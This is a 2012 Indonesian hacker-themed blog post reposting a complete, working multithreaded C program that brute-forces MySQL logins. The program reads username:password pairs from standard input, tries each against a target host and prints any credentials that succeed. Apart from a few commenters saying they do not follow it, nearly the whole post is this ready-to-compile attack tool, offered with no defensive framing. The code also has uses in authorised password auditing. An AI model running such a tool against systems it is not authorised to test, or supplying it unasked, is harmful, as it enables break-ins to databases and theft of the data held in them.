.
Dr. Cruzz. Diberdayakan oleh Blogger.

Imagination Will Take You Everywhere, Get the Codes and Feel the Soul
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv1: ~]#...
./e0f
[+] Post Title :

MySQL Brute Force Tool [ c++ ]


[+] Date : Minggu, 26 Februari 2012
[+] Author : Dr. Cruzz
[+] Link : http://xcruzz.blogspot.com/2012/02/mysql-brute-force-tool-c.html
[+] Type :
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Library General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place – Suite 330, Boston, MA 02111-1307, USA.
*
* $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $
*
* Author:
* NAME: James Stevenson
* WWW: http://www.stev.org
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <getopt.h>
#include <string.h>
#include <pthread.h>
 
#include <mysql/mysql.h>
 
int verbose = 0;
int total = 0;
volatile int quit = 0;
 
pthread_mutex_t mutex_pass =  PTHREAD_MUTEX_INITIALIZER;
 
struct args {
  char *host;
  char *db;
  int port;
};
 
void print_help(FILE *fp, char *app) {
  fprintf(fp, "Usage: %s [<options>]\n", app);
  fprintf(fp, "\n");
  fprintf(fp, "     -h          Print this help and exit\n");
  fprintf(fp, "     -v          Verbose. Repeat for more info\n");
  fprintf(fp, "     -t <host>   host to try\n");
  fprintf(fp, "     -p <port>   port to connect on\n");
  fprintf(fp, "     -n <num>    number of threads to use\n");
  fprintf(fp, "\n");
  fprintf(fp, "Note: usernames / password will be read from stdin\n");
  fprintf(fp, "The format for this is username : password\n");
  fprintf(fp, "\n");
}
 
int try(char *hostname, char *username, char *password, char *db, int port) {
  MYSQL mysql;
  mysql_init(&mysql);
 
  if (!mysql_real_connect(&mysql, hostname, username, password, db, port, NULL, 0)) {
    switch(mysql_errno(&mysql)) {
      case 1045: /* ER_ACCESS_DENIED_ERROR */
        if (verbose >= 1)
          printf("Failed: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));
        break;
      default:
        printf("Unknown Error: %d -> %s\n",  mysql_errno(&mysql),  mysql_error(&mysql));
        break;
    }
    return 0;
  }
 
  if (verbose >= 1)
    printf("Success: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));
 
  mysql_close(&mysql);
  return 1;
}
 
int getpassword(char **buf, size_t *buflen, char **username, char **password) {
 
  pthread_mutex_lock(&mutex_pass);
 
  if (getline(buf, buflen, stdin) >= 0) {
    pthread_mutex_unlock(&mutex_pass);
    char *tmp = strchr(*buf, ':');
    if (tmp == 0 || tmp[1] == 0)
      return 0;
    *username = *buf;
    *tmp = 0;
    tmp++;
    *password = tmp;
    tmp = strchr(*password, '\n');
    if (tmp != 0)
      *tmp = 0;
    if (verbose >= 2)
      printf("username: %s password: %s\n", *username, *password);
    return 1;
  }
 
  pthread_mutex_unlock(&mutex_pass);
  return 0;
}
 
void *run(void *p) {
  struct args *a = (struct args *) p;
  char *buf = 0;
  size_t buflen = 0;
  char *user = 0;
  char *pass = 0;
 
  while(quit == 0) {
    if (getpassword(&buf, &buflen, &user, &pass) == 0)
      goto free; /* we ran out of passwords */
 
    if (try(a->host, user, pass, a->db, a->port)) {
      printf("Success! Username: %s Password: %s\n", user, pass);
      quit = 1;
      goto free;
    }
  }
 
free:
  if (buf != NULL)
    free(buf);
 
  pthread_exit(NULL);
  return NULL;
}
 
int main(int argc, char **argv) {
  struct args args;
  pthread_t *thd;
  pthread_attr_t attr;
  int nthreads = 1;
  int i = 0;
  int c;
 
  memset(&args, 0, sizeof(args));
 
  while( (c = getopt(argc, argv, "d:hn: p:t:v" )) != -1) {
    switch(c) {
      case 'd':
        args.db = optarg;
        break;
      case 'h':
        print_help(stdout, argv[0]);
        exit(EXIT_SUCCESS);
        break;
      case 'n':
        nthreads = atoi(optarg);
        break;
      case 't':
        args.host = optarg;
        break;
      case 'v':
        verbose++;
        break;
      case 'p':
        args.port = atoi(optarg);
        break;
    }
  }
 
  if (args.db == NULL)
    args.db = "mysql";
 
  if (args.host == NULL)
    args.host = "localhost";
 
  thd = malloc(nthreads * sizeof(*thd));
  if (!thd) {
    perror("malloc");
    exit(EXIT_FAILURE);
  }
 
  mysql_library_init(0, NULL, NULL); 
 
  if (pthread_attr_init(&attr) != 0) {
    perror("pthread_attr_init");
    exit(EXIT_FAILURE);
  }
 
  if (pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE) != 0) {
    perror("pthread_attr_setdetachstate");
    exit(EXIT_FAILURE);
  }
 
  for(i=0;i<nthreads;i++) {
    if (pthread_create(&thd[i], NULL, run, &args) != 0) {
      perror("pthread_create");
      exit(EXIT_FAILURE);
    }
  }
 
  for(i=0;i<nthreads;i++) {
    if (pthread_join(thd[i], NULL) != 0) {
      perror("pthread_join");
      exit(EXIT_FAILURE);
    }
  }
 
  pthread_attr_destroy(&attr);
 
  free(thd); 
 
  mysql_library_end();
  return EXIT_SUCCESS;
}
 

3 komentar:

Jasa Pembuatan Aplikasi Klinik mengatakan...

wehhh... aku gak mudeng bozz...., nyimak aja lah...

Anonim mengatakan...

#bingung

whatscan mengatakan...

kalo gak mudeng ya gandeng aja boz :D

Posting Komentar